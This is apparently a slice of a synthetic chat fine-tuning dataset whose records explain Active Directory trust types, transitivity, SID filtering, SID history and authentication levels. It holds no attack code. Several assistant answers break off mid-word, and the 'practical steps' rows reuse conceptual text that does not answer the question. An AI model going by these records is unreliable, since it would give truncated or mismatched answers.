a direct attribute but is identified based on other TDO attributes (see \"How Domain and Forest Trusts Work > Trust Types\"#trust-types)).\n\n1. Parent-Child: this type of trust relationship exists between a parent domain and a child domain in the same forest. The parent domain trusts the child domain, and the child domain trusts the parent domain. This type of trust is automatically created when a new child domain is created in a forest.\n2. Tree-Root: exists between the root domain of a tree and the root domain of another tree in the same forest. This type of trust is automatically created when a new tree is created in a forest.\n3. Shortcut (a.k.a. cross-link): exists between two child domains of different tree (i.e. different parent domains) within the same forest. This type of trust relationship is used to reduce the number of authentication hops between distant domains. It is a one-way or two-way transitive trust.\n4. External: exists between a domain in one forest and a domain in a different forest. It allows users in one domain to access resources in the other domain. It's usually set up when accessing resources in a forest without trust relationships established.\n5. Forest: exists between two forests (i.e. between two root domains in their respective forest). It allows users in one forest to access resources in the other forest.\n6. Realm: exists between a Windows domain and a non-Windows domain, such as a Kerberos realm. It allows users in the Windows domain to access resources in the non-Windows domain.\n\n| Trust type | Transitivity | Direction | Auth. mechanisms | Creation mode |\n| --- | --- | --- | --- | --- |\n| Parent-Child | Transitive | Two-way | Either | Automatic |\n| Tree-Root | Transitive | Two-way | Either | Automatic |\n| Shortcut (a.k.a. cross-link) | Transitive | Either | Either | Manual |\n| Realm | Either | Either | Kerberos V5 o", "metadata": {"corpus_index": 1122, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Trusts - Trust flavor"}, {"role": "assistant", "content": "The trust \"flavor\", on the other hand, represents the nature of the trust relationship between domains or forests. It is not a direct attribute but is identified based on other TDO attributes (see \"How Domain and Forest Trusts Work > Trust Types\"#trust-types)).\n\n1. Parent-Child: this type of trust relationship exists between a parent domain and a child domain in the same forest. The parent domain trusts the child domain, and the child domain trusts the parent domain. This type of trust is automatically created when a new child domain is created in a forest.\n2. Tree-Root: exists between the root domain of a tree and the root domain of another tree in the same forest. This type of trust is automatically created when a new tree is created in a forest.\n3. Shortcut (a.k.a. cross-link): exists between two child domains of different tree (i.e. different parent domains) within the same forest. This type of trust relationship is used to reduce the number of authentication hops between distant domains. It is a one-way or two-way transitive trust.\n4. External: exists between a domain in one forest and a domain in a different forest. It allows users in one domain to access resources in the other domain. It's usually set up when accessing resources in a forest without trust relationships established.\n5. Forest: exists between two forests (i.e. between two root domains in their respective forest). It allows users in one forest to access resources in the other forest.\n6. Realm: exists between a Windows domain and a non-Windows domain, such as a Kerberos realm. It allows users in the Windows domain to access resources in the non-Windows domain.\n\n| Trust type | Transitivity | Direction | Auth. mechanisms | Creation mode |\n| --- | --- | --- | --- | --- |\n| Parent-Child | Transitive | Two-way | Either | Automatic |\n| Tree-Root | Transitive | Two-way | Either | Automatic |\n| Shortcut (a.k.a. cross-link) | Transitive | Either | Either | Manual |\n| Realm | Either | Either | Kerberos V5 o"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Trusts - Trust flavor", "response": "The trust \"flavor\", on the other hand, represents the nature of the trust relationship between domains or forests. It is not a direct attribute but is identified based on other TDO attributes (see \"How Domain and Forest Trusts Work > Trust Types\"#trust-types)).\n\n1. Parent-Child: this type of trust relationship exists between a parent domain and a child domain in the same forest. The parent domain trusts the child domain, and the child domain trusts the parent domain. This type of trust is automatically created when a new child domain is created in a forest.\n2. Tree-Root: exists between the root domain of a tree and the root domain of another tree in the same forest. This type of trust is automatically created when a new tree is created in a forest.\n3. Shortcut (a.k.a. cross-link): exists between two child domains of different tree (i.e. different parent domains) within the same forest. This type of trust relationship is used to reduce the number of authentication hops between distant domains. It is a one-way or two-way transitive trust.\n4. External: exists between a domain in one forest and a domain in a different forest. It allows users in one domain to access resources in the other domain. It's usually set up when accessing resources in a forest without trust relationships established.\n5. Forest: exists between two forests (i.e. between two root domains in their respective forest). It allows users in one forest to access resources in the other forest.\n6. Realm: exists between a Windows domain and a non-Windows domain, such as a Kerberos realm. It allows users in the Windows domain to access resources in the non-Windows domain.\n\n| Trust type | Transitivity | Direction | Auth. mechanisms | Creation mode |\n| --- | --- | --- | --- | --- |\n| Parent-Child | Transitive | Two-way | Either | Automatic |\n| Tree-Root | Transitive | Two-way | Either | Automatic |\n| Shortcut (a.k.a. cross-link) | Transitive | Either | Either | Manual |\n| Realm | Either | Either | Kerberos V5 o", "metadata": {"corpus_index": 1122, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Trusts - Transitivity"}, {"role": "assistant", "content": "In Active Directory, a transitive trust is a type of trust relationship that allows access to resources to be passed from one domain to another. When a transitive trust is established between two domains, any trusts that have been established with the first domain are automatically extended to the second domain. This means that if Domain A trusts Domain B and Domain B trusts Domain C, then Domain A automatically trusts Domain C, even if there is no direct trust relationship between Domain A and Domain C. Transitive trusts are useful in large, complex networks where multiple trust relationships have been established between many different domains. They help to simplify the process of accessing resources and reduce the number of authentication hops that may be required.\n\n> [!TIP]\n> The transitivity status of a trust depends on the trustAttributes flags of a TDO.\n>\n> > * If the TRUST_ATTRIBUTE_NON_TRANSITIVE (0x00000001) flag is set then the transitivity is disabled.\n> > * If the TRUST_ATTRIBUTE_WITHIN_FOREST (0x00000020) flag is set then the transitivity is enabled.\n> > * If the TRUST_ATTRIBUTE_FOREST_TRANSITIVE (0x00000008) flag is set then the transitivity is enabled.\n> >\n> > In any other case the transitivity is disabled.\n> >\n> > _(by_ _Carsten Sandker_ _on_ _www.securesystems.de__)_"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Trusts - Transitivity", "response": "In Active Directory, a transitive trust is a type of trust relationship that allows access to resources to be passed from one domain to another. When a transitive trust is established between two domains, any trusts that have been established with the first domain are automatically extended to the second domain. This means that if Domain A trusts Domain B and Domain B trusts Domain C, then Domain A automatically trusts Domain C, even if there is no direct trust relationship between Domain A and Domain C. Transitive trusts are useful in large, complex networks where multiple trust relationships have been established between many different domains. They help to simplify the process of accessing resources and reduce the number of authentication hops that may be required.\n\n> [!TIP]\n> The transitivity status of a trust depends on the trustAttributes flags of a TDO.\n>\n> > * If the TRUST_ATTRIBUTE_NON_TRANSITIVE (0x00000001) flag is set then the transitivity is disabled.\n> > * If the TRUST_ATTRIBUTE_WITHIN_FOREST (0x00000020) flag is set then the transitivity is enabled.\n> > * If the TRUST_ATTRIBUTE_FOREST_TRANSITIVE (0x00000008) flag is set then the transitivity is enabled.\n> >\n> > In any other case the transitivity is disabled.\n> >\n> > _(by_ _Carsten Sandker_ _on_ _www.securesystems.de__)_", "metadata": {"corpus_index": 1123, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Trusts - Transitivity"}, {"role": "assistant", "content": "In Active Directory, a transitive trust is a type of trust relationship that allows access to resources to be passed from one domain to another. When a transitive trust is established between two domains, any trusts that have been established with the first domain are automatically extended to the second domain. This means that if Domain A trusts Domain B and Domain B trusts Domain C, then Domain A automatically trusts Domain C, even if there is no direct trust relationship between Domain A and Domain C. Transitive trusts are useful in large, complex networks where multiple trust relationships have been established between many different domains. They help to simplify the process of accessing resources and reduce the number of authentication hops that may be required.\n\n> [!TIP]\n> The transitivity status of a trust depends on the trustAttributes flags of a TDO.\n>\n> > * If the TRUST_ATTRIBUTE_NON_TRANSITIVE (0x00000001) flag is set then the transitivity is disabled.\n> > * If the TRUST_ATTRIBUTE_WITHIN_FOREST (0x00000020) flag is set then the transitivity is enabled.\n> > * If the TRUST_ATTRIBUTE_FOREST_TRANSITIVE (0x00000008) flag is set then the transitivity is enabled.\n> >\n> > In any other case the transitivity is disabled.\n> >\n> > _(by_ _Carsten Sandker_ _on_ _www.securesystems.de__)_"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Trusts - Transitivity", "response": "In Active Directory, a transitive trust is a type of trust relationship that allows access to resources to be passed from one domain to another. When a transitive trust is established between two domains, any trusts that have been established with the first domain are automatically extended to the second domain. This means that if Domain A trusts Domain B and Domain B trusts Domain C, then Domain A automatically trusts Domain C, even if there is no direct trust relationship between Domain A and Domain C. Transitive trusts are useful in large, complex networks where multiple trust relationships have been established between many different domains. They help to simplify the process of accessing resources and reduce the number of authentication hops that may be required.\n\n> [!TIP]\n> The transitivity status of a trust depends on the trustAttributes flags of a TDO.\n>\n> > * If the TRUST_ATTRIBUTE_NON_TRANSITIVE (0x00000001) flag is set then the transitivity is disabled.\n> > * If the TRUST_ATTRIBUTE_WITHIN_FOREST (0x00000020) flag is set then the transitivity is enabled.\n> > * If the TRUST_ATTRIBUTE_FOREST_TRANSITIVE (0x00000008) flag is set then the transitivity is enabled.\n> >\n> > In any other case the transitivity is disabled.\n> >\n> > _(by_ _Carsten Sandker_ _on_ _www.securesystems.de__)_", "metadata": {"corpus_index": 1123, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Trusts - SID filtering in the context of penetration testing"}, {"role": "assistant", "content": "According to Microsoft, the security boundary in Active Directory is the forest, not the domain. The forest defines the boundaries of trust and controls access to resources within the forest.\n\nThe domain is a unit within a forest and represents a logical grouping of users, computers, and other resources. Users within a domain can access resources within their own domain and can also access resources in other domains within the same forest, as long as they have the appropriate permissions. Users cannot access resources in other forests unless a trust relationship has been established between the forests.\n\nSID filtering plays an important role in the security boundary by making sure \"only SIDs from the trusted domain will be accepted for authorization data returned during authentication. SIDs from other domains will be removed\" (netdom cmdlet output). By default, SID filtering is disabled for intra-forest trusts, and enabled for inter-forest trusts.\n\n![](<./assets/SID filtering default configs.png>)\n\nDefault configurations (source: securesystems.de){.caption}\n\n![](<./assets/SID filtering custom configs.png>)\n\nCustom configurations (source: securesystems.de){.caption}\n\nSection 4.1.2.2 of \\[MS-PAC] specifies what is filtered and when. There are three important things to remember from this documentation:\n\n* if SID filtering is fully enabled, all SIDs that differ from the trusted domain will be filtered out\n* even if it's enabled, a few SIDs will (almost) never be filtered: \"Enterprise Domain Controllers\" (S-1-5-9) SID and those described by the trusted domain object (TDO), as well as seven well-known SIDs (see MS-PAC doc, and improsec's blogpost).\n* there are two kinds of inter-forest trusts: \"Forest\", and \"External\" (see trust types). Microsoft says \"cross-forest trusts are more stringently filtered than external trusts\", meaning that in External trusts, SID filtering only filters out RID < 1000.\n\n![](<./assets/MS PAC section 4.1.2.2.png>)\n\n[MS-PAC] section 4.1.2.2{.cap"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Trusts - SID filtering in the context of penetration testing", "response": "According to Microsoft, the security boundary in Active Directory is the forest, not the domain. The forest defines the boundaries of trust and controls access to resources within the forest.\n\nThe domain is a unit within a forest and represents a logical grouping of users, computers, and other resources. Users within a domain can access resources within their own domain and can also access resources in other domains within the same forest, as long as they have the appropriate permissions. Users cannot access resources in other forests unless a trust relationship has been established between the forests.\n\nSID filtering plays an important role in the security boundary by making sure \"only SIDs from the trusted domain will be accepted for authorization data returned during authentication. SIDs from other domains will be removed\" (netdom cmdlet output). By default, SID filtering is disabled for intra-forest trusts, and enabled for inter-forest trusts.\n\n![](<./assets/SID filtering default configs.png>)\n\nDefault configurations (source: securesystems.de){.caption}\n\n![](<./assets/SID filtering custom configs.png>)\n\nCustom configurations (source: securesystems.de){.caption}\n\nSection 4.1.2.2 of \\[MS-PAC] specifies what is filtered and when. There are three important things to remember from this documentation:\n\n* if SID filtering is fully enabled, all SIDs that differ from the trusted domain will be filtered out\n* even if it's enabled, a few SIDs will (almost) never be filtered: \"Enterprise Domain Controllers\" (S-1-5-9) SID and those described by the trusted domain object (TDO), as well as seven well-known SIDs (see MS-PAC doc, and improsec's blogpost).\n* there are two kinds of inter-forest trusts: \"Forest\", and \"External\" (see trust types). Microsoft says \"cross-forest trusts are more stringently filtered than external trusts\", meaning that in External trusts, SID filtering only filters out RID < 1000.\n\n![](<./assets/MS PAC section 4.1.2.2.png>)\n\n[MS-PAC] section 4.1.2.2{.cap", "metadata": {"corpus_index": 1124, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Trusts - SID filtering during a pentest?"}, {"role": "assistant", "content": "According to Microsoft, the security boundary in Active Directory is the forest, not the domain. The forest defines the boundaries of trust and controls access to resources within the forest.\n\nThe domain is a unit within a forest and represents a logical grouping of users, computers, and other resources. Users within a domain can access resources within their own domain and can also access resources in other domains within the same forest, as long as they have the appropriate permissions. Users cannot access resources in other forests unless a trust relationship has been established between the forests.\n\nSID filtering plays an important role in the security boundary by making sure \"only SIDs from the trusted domain will be accepted for authorization data returned during authentication. SIDs from other domains will be removed\" (netdom cmdlet output). By default, SID filtering is disabled for intra-forest trusts, and enabled for inter-forest trusts.\n\n![](<./assets/SID filtering default configs.png>)\n\nDefault configurations (source: securesystems.de){.caption}\n\n![](<./assets/SID filtering custom configs.png>)\n\nCustom configurations (source: securesystems.de){.caption}\n\nSection 4.1.2.2 of \\[MS-PAC] specifies what is filtered and when. There are three important things to remember from this documentation:\n\n* if SID filtering is fully enabled, all SIDs that differ from the trusted domain will be filtered out\n* even if it's enabled, a few SIDs will (almost) never be filtered: \"Enterprise Domain Controllers\" (S-1-5-9) SID and those described by the trusted domain object (TDO), as well as seven well-known SIDs (see MS-PAC doc, and improsec's blogpost).\n* there are two kinds of inter-forest trusts: \"Forest\", and \"External\" (see trust types). Microsoft says \"cross-forest trusts are more stringently filtered than external trusts\", meaning that in External trusts, SID filtering only filters out RID < 1000.\n\n![](<./assets/MS PAC section 4.1.2.2.png>)\n\n[MS-PAC] section 4.1.2.2{.cap"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Trusts - SID filtering during a pentest?", "response": "According to Microsoft, the security boundary in Active Directory is the forest, not the domain. The forest defines the boundaries of trust and controls access to resources within the forest.\n\nThe domain is a unit within a forest and represents a logical grouping of users, computers, and other resources. Users within a domain can access resources within their own domain and can also access resources in other domains within the same forest, as long as they have the appropriate permissions. Users cannot access resources in other forests unless a trust relationship has been established between the forests.\n\nSID filtering plays an important role in the security boundary by making sure \"only SIDs from the trusted domain will be accepted for authorization data returned during authentication. SIDs from other domains will be removed\" (netdom cmdlet output). By default, SID filtering is disabled for intra-forest trusts, and enabled for inter-forest trusts.\n\n![](<./assets/SID filtering default configs.png>)\n\nDefault configurations (source: securesystems.de){.caption}\n\n![](<./assets/SID filtering custom configs.png>)\n\nCustom configurations (source: securesystems.de){.caption}\n\nSection 4.1.2.2 of \\[MS-PAC] specifies what is filtered and when. There are three important things to remember from this documentation:\n\n* if SID filtering is fully enabled, all SIDs that differ from the trusted domain will be filtered out\n* even if it's enabled, a few SIDs will (almost) never be filtered: \"Enterprise Domain Controllers\" (S-1-5-9) SID and those described by the trusted domain object (TDO), as well as seven well-known SIDs (see MS-PAC doc, and improsec's blogpost).\n* there are two kinds of inter-forest trusts: \"Forest\", and \"External\" (see trust types). Microsoft says \"cross-forest trusts are more stringently filtered than external trusts\", meaning that in External trusts, SID filtering only filters out RID < 1000.\n\n![](<./assets/MS PAC section 4.1.2.2.png>)\n\n[MS-PAC] section 4.1.2.2{.cap", "metadata": {"corpus_index": 1124, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Trusts - SID history?"}, {"role": "assistant", "content": "The SID (Security Identifier) is a unique identifier that is assigned to each security principal (e.g. user, group, computer). It is used to identify the principal within the domain and is used to control access to resources.\n\nThe SID history is a property of a user or group object that allows the object to retain its SID when it is migrated from one domain to another as part of a domain consolidation or restructuring. When an object is migrated to a new domain, it is assigned a new SID in the target domain. The SID history allows the object to retain its original SID, so that access to resources in the source domain is not lost.\n\nMany resources across the Internet, including Microsoft's docs and tools, state that SID history can be enabled across a trust. This is not 100% true. SID history is not a feature that can be toggled on or off per say.\n\nWhen authenticating across trusts using Kerberos, it is assumed that the extra SID field of the ticket's PAC (Privileged Attribute Certificate) reflects the SID history attribute of the authenticating user. With SID filtering enabled in a trust, the SIDs contained in that field are filtered, effectively preventing SID history from doing its job. There are certain scenarios where some SIDs are not filtered, allowing for example SIDs with a RID >= 1000. Some, including Microsoft, call it \"enabling SID history\", but in fact, SID history is not toggled on or off here, it's the behavior of SID filtering that is adjusted. I'd call that \"partial SID filtering\", or \"unencumbered SID history\". Dirk-jan Mollema calls that \"SID filtering relaxation\".\n\nWhen authenticating with NTLM, the process is highly similar, see the NTLM authentication theory chapter for more information."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Trusts - SID history?", "response": "The SID (Security Identifier) is a unique identifier that is assigned to each security principal (e.g. user, group, computer). It is used to identify the principal within the domain and is used to control access to resources.\n\nThe SID history is a property of a user or group object that allows the object to retain its SID when it is migrated from one domain to another as part of a domain consolidation or restructuring. When an object is migrated to a new domain, it is assigned a new SID in the target domain. The SID history allows the object to retain its original SID, so that access to resources in the source domain is not lost.\n\nMany resources across the Internet, including Microsoft's docs and tools, state that SID history can be enabled across a trust. This is not 100% true. SID history is not a feature that can be toggled on or off per say.\n\nWhen authenticating across trusts using Kerberos, it is assumed that the extra SID field of the ticket's PAC (Privileged Attribute Certificate) reflects the SID history attribute of the authenticating user. With SID filtering enabled in a trust, the SIDs contained in that field are filtered, effectively preventing SID history from doing its job. There are certain scenarios where some SIDs are not filtered, allowing for example SIDs with a RID >= 1000. Some, including Microsoft, call it \"enabling SID history\", but in fact, SID history is not toggled on or off here, it's the behavior of SID filtering that is adjusted. I'd call that \"partial SID filtering\", or \"unencumbered SID history\". Dirk-jan Mollema calls that \"SID filtering relaxation\".\n\nWhen authenticating with NTLM, the process is highly similar, see the NTLM authentication theory chapter for more information.", "metadata": {"corpus_index": 1125, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Trusts - SID history?"}, {"role": "assistant", "content": "The SID (Security Identifier) is a unique identifier that is assigned to each security principal (e.g. user, group, computer). It is used to identify the principal within the domain and is used to control access to resources.\n\nThe SID history is a property of a user or group object that allows the object to retain its SID when it is migrated from one domain to another as part of a domain consolidation or restructuring. When an object is migrated to a new domain, it is assigned a new SID in the target domain. The SID history allows the object to retain its original SID, so that access to resources in the source domain is not lost.\n\nMany resources across the Internet, including Microsoft's docs and tools, state that SID history can be enabled across a trust. This is not 100% true. SID history is not a feature that can be toggled on or off per say.\n\nWhen authenticating across trusts using Kerberos, it is assumed that the extra SID field of the ticket's PAC (Privileged Attribute Certificate) reflects the SID history attribute of the authenticating user. With SID filtering enabled in a trust, the SIDs contained in that field are filtered, effectively preventing SID history from doing its job. There are certain scenarios where some SIDs are not filtered, allowing for example SIDs with a RID >= 1000. Some, including Microsoft, call it \"enabling SID history\", but in fact, SID history is not toggled on or off here, it's the behavior of SID filtering that is adjusted. I'd call that \"partial SID filtering\", or \"unencumbered SID history\". Dirk-jan Mollema calls that \"SID filtering relaxation\".\n\nWhen authenticating with NTLM, the process is highly similar, see the NTLM authentication theory chapter for more information."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Trusts - SID history?", "response": "The SID (Security Identifier) is a unique identifier that is assigned to each security principal (e.g. user, group, computer). It is used to identify the principal within the domain and is used to control access to resources.\n\nThe SID history is a property of a user or group object that allows the object to retain its SID when it is migrated from one domain to another as part of a domain consolidation or restructuring. When an object is migrated to a new domain, it is assigned a new SID in the target domain. The SID history allows the object to retain its original SID, so that access to resources in the source domain is not lost.\n\nMany resources across the Internet, including Microsoft's docs and tools, state that SID history can be enabled across a trust. This is not 100% true. SID history is not a feature that can be toggled on or off per say.\n\nWhen authenticating across trusts using Kerberos, it is assumed that the extra SID field of the ticket's PAC (Privileged Attribute Certificate) reflects the SID history attribute of the authenticating user. With SID filtering enabled in a trust, the SIDs contained in that field are filtered, effectively preventing SID history from doing its job. There are certain scenarios where some SIDs are not filtered, allowing for example SIDs with a RID >= 1000. Some, including Microsoft, call it \"enabling SID history\", but in fact, SID history is not toggled on or off here, it's the behavior of SID filtering that is adjusted. I'd call that \"partial SID filtering\", or \"unencumbered SID history\". Dirk-jan Mollema calls that \"SID filtering relaxation\".\n\nWhen authenticating with NTLM, the process is highly similar, see the NTLM authentication theory chapter for more information.", "metadata": {"corpus_index": 1125, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Trusts - Authentication level?"}, {"role": "assistant", "content": "Inter-forest trusts (\"External\" and \"Forest\" trusts) can be configured with different levels of authentication:\n\n* Forest-wide authentication: allows unrestricted authentication from the trusted forest's principals to the trusting forest's resources. This is the least secure level, it completely opens one forest to another (authentication-wise though, not access-wise). This level is specific to intra-forest trusts.\n* Domain-wide authentication: allows unrestricted authentication from the trusted domain's principals to the trusting domain's resources. This is more secure than forest-wide authentication because it only allows users in a specific (trusted) domain to access resources in another (trusting).\n* Selective authentication: allows only specific users in the trusted domain to access resources in the trusting domain. This is the most secure type of trust because it allows administrators to tightly control access to resources in the trusted domain. In order to allow a \"trusted user\" to access a \"trusting resource\", the resource's DACL must include an ACE in which the trusted user has the \"Allowed-To-Authenticate\" extended right (GUID: 68b1d179-0d15-4d4f-ab71-46152e79a7bc).\n\nIt's worth noting that selective authentication is less used by the general public due to its complexity, but it's definitely the most restrictive, hence secure, choice.\n\n> [!TIP]\n> The authentication level of a trust depends on the trustAttributes flags of a TDO.\n> \n> > * If the trust relationship is made within a forest boundary (aka if the TRUST_ATTRIBUTE_WITHIN_FOREST (0x00000020) flag is set), then Forest-Wide Authentication will always be used.\n> >* f the trust relationship crosses a forest boundary and the TRUST_ATTRIBUTE_CROSS_ORGANIZATION (0x00000010) flag is set then Selective Authentication is used.\n> >* If the trust relationship crosses a forest boundary, but the trust is marked as transitive (aka if the TRUST_ATTRIBUTE_FOREST_TRANSITIVE (0x00000008) flag is set), then Forest-Wide "}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Trusts - Authentication level?", "response": "Inter-forest trusts (\"External\" and \"Forest\" trusts) can be configured with different levels of authentication:\n\n* Forest-wide authentication: allows unrestricted authentication from the trusted forest's principals to the trusting forest's resources. This is the least secure level, it completely opens one forest to another (authentication-wise though, not access-wise). This level is specific to intra-forest trusts.\n* Domain-wide authentication: allows unrestricted authentication from the trusted domain's principals to the trusting domain's resources. This is more secure than forest-wide authentication because it only allows users in a specific (trusted) domain to access resources in another (trusting).\n* Selective authentication: allows only specific users in the trusted domain to access resources in the trusting domain. This is the most secure type of trust because it allows administrators to tightly control access to resources in the trusted domain. In order to allow a \"trusted user\" to access a \"trusting resource\", the resource's DACL must include an ACE in which the trusted user has the \"Allowed-To-Authenticate\" extended right (GUID: 68b1d179-0d15-4d4f-ab71-46152e79a7bc).\n\nIt's worth noting that selective authentication is less used by the general public due to its complexity, but it's definitely the most restrictive, hence secure, choice.\n\n> [!TIP]\n> The authentication level of a trust depends on the trustAttributes flags of a TDO.\n> \n> > * If the trust relationship is made within a forest boundary (aka if the TRUST_ATTRIBUTE_WITHIN_FOREST (0x00000020) flag is set), then Forest-Wide Authentication will always be used.\n> >* f the trust relationship crosses a forest boundary and the TRUST_ATTRIBUTE_CROSS_ORGANIZATION (0x00000010) flag is set then Selective Authentication is used.\n> >* If the trust relationship crosses a forest boundary, but the trust is marked as transitive (aka if the TRUST_ATTRIBUTE_FOREST_TRANSITIVE (0x00000008) flag is set), then Forest-Wide ", "metadata": {"corpus_index": 1126, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Trusts - Authentication level?"}, {"role": "assistant", "content": "Inter-forest trusts (\"External\" and \"Forest\" trusts) can be configured with different levels of authentication:\n\n* Forest-wide authentication: allows unrestricted authentication from the trusted forest's principals to the trusting forest's resources. This is the least secure level, it completely opens one forest to another (authentication-wise though, not access-wise). This level is specific to intra-forest trusts.\n* Domain-wide authentication: allows unrestricted authentication from the trusted domain's principals to the trusting domain's resources. This is more secure than forest-wide authentication because it only allows users in a specific (trusted) domain to access resources in another (trusting).\n* Selective authentication: allows only specific users in the trusted domain to access resources in the trusting domain. This is the most secure type of trust because it allows administrators to tightly control access to resources in the trusted domain. In order to allow a \"trusted user\" to access a \"trusting resource\", the resource's DACL must include an ACE in which the trusted user has the \"Allowed-To-Authenticate\" extended right (GUID: 68b1d179-0d15-4d4f-ab71-46152e79a7bc).\n\nIt's worth noting that selective authentication is less used by the general public due to its complexity, but it's definitely the most restrictive, hence secure, choice.\n\n> [!TIP]\n> The authentication level of a trust depends on the trustAttributes flags of a TDO.\n> \n> > * If the trust relationship is made within a forest boundary (aka if the TRUST_ATTRIBUTE_WITHIN_FOREST (0x00000020) flag is set), then Forest-Wide Authentication will always be used.\n> >* f the trust relationship crosses a forest boundary and the TRUST_ATTRIBUTE_CROSS_ORGANIZATION (0x00000010) flag is set then Selective Authentication is used.\n> >* If the trust relationship crosses a forest boundary, but the trust is marked as transitive (aka if the TRUST_ATTRIBUTE_FOREST_TRANSITIVE (0x00000008) flag is set), then Forest-Wide "}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Trusts - Authentication level?", "response": "Inter-forest trusts (\"External\" and \"Forest\" trusts) can be configured with different levels of authentication:\n\n* Forest-wide authentication: allows unrestricted authentication from the trusted forest's principals to the trusting forest's resources. This is the least secure level, it completely opens one forest to another (authentication-wise though, not access-wise). This level is specific to intra-forest trusts.\n* Domain-wide authentication: allows unrestricted authentication from the trusted domain's principals to the trusting domain's resources. This is more secure than forest-wide authentication because it only allows users in a specific (trusted) domain to access resources in another (trusting).\n* Selective authentication: allows only specific users in the trusted domain to access resources in the trusting domain. This is the most secure type of trust because it allows administrators to tightly control access to resources in the trusted domain. In order to allow a \"trusted user\" to access a \"trusting resource\", the resource's DACL must include an ACE in which the trusted user has the \"Allowed-To-Authenticate\" extended right (GUID: 68b1d179-0d15-4d4f-ab71-46152e79a7bc).\n\nIt's worth noting that selective authentication is less used by the general public due to its complexity, but it's definitely the most restrictive, hence secure, choice.\n\n> [!TIP]\n> The authentication level of a trust depends on the trustAttributes flags of a TDO.\n> \n> > * If the trust relationship is made within a forest boundary (aka if the TRUST_ATTRIBUTE_WITHIN_FOREST (0x00000020) flag is set), then Forest-Wide Authentication will always be used.\n> >* f the trust relationship crosses a forest boundary and the TRUST_ATTRIBUTE_CROSS_ORGANIZATION (0x00000010) flag is set then Selective Authentication is used.\n> >* If the trust relationship crosses a forest boundary, but the trust is marked as transitive (aka if the TRUST_ATTRIBUTE_FOREST_TRANSITIVE 